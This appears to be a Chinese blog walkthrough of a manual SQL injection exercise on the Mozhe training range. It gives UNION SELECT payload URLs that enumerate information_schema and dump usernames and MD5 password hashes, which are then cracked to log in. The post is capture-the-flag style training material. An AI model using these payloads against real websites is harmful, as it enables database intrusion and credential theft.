SQL手工注入漏洞测试(MySQL数据库)——墨者学院

在线靶场:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

进入靶场点击通知

 1.判断注入点

在id后面输入 and 1=1发现页面不变

在id后面输入 and 1=2发现页面内容消失,所以可能存在注入点

2.判断列名数量(使用order by猜解)

依次按顺序输入1,2,3,4,5,当输入到5时,发现内容消失,所以只有列名数量为4

 3.判断显示位

这里使用union联合查询,同时判断2和3位存在显示位 

 4.获取数据库版本和操作系统

数据库版本:version()

操作系统:@@version_compile_os 

 5.获取数据库名和用户

数据库名:database()

用户:user()

 6.获取系统登录账户和密码

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

table_schema:数据库名

collumn_name:列名

6.1查询数据库mozhe_Discuz_StormGroup下的表名信息:

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(table_name ),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

 这里得到两个表

6.2查询表StormGroup_member和notice下的列名信息:

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice' 

由两张图可知排除表notice,表StormGroup_member存在系统登录用户和密码

6.3通过表StormGroup_member查询用户登录账号和密码

 http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

 

 这里我们得到一个账户有两个用MD5加密过的密码数据,对其解密

最后通过登录发现密码dsan13是被禁用,正确密码为862693,成功登录并拿到key 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值